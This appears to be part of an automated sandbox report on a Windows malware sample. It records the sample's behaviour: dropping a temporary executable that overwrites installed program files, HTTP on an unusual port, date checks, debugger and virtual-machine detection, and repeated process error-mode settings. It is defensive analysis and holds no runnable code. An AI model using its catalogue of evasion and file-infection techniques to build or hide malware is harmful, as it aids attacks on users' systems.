Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	File created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49704 -> 799

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Memory allocated: 21D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Memory allocated: 2600000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Memory allocated: 2400000 memory reserve \| memory write watch	Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

API coverage: 9.8 %

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F41718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00F41754h

1_2_00F41718

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00F429E2

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F42B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00F42B8C

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040CE09

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00485044 mov eax, dword ptr fs:[00000030h]	0_2_00485044
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0061092B mov eax, dword ptr fs:[00000030h]	0_2_0061092B
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00610D90 mov eax, dword ptr fs:[00000030h]	0_2_00610D90
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0068EF83 push dword ptr fs:[00000030h]	0_2_0068EF83

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Code function: 0_2_0040ADB0 GetProcessHeap,HeapFree,

0_2_0040ADB0

Enables debug privileges

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040CE09
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040E61C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00416F6A
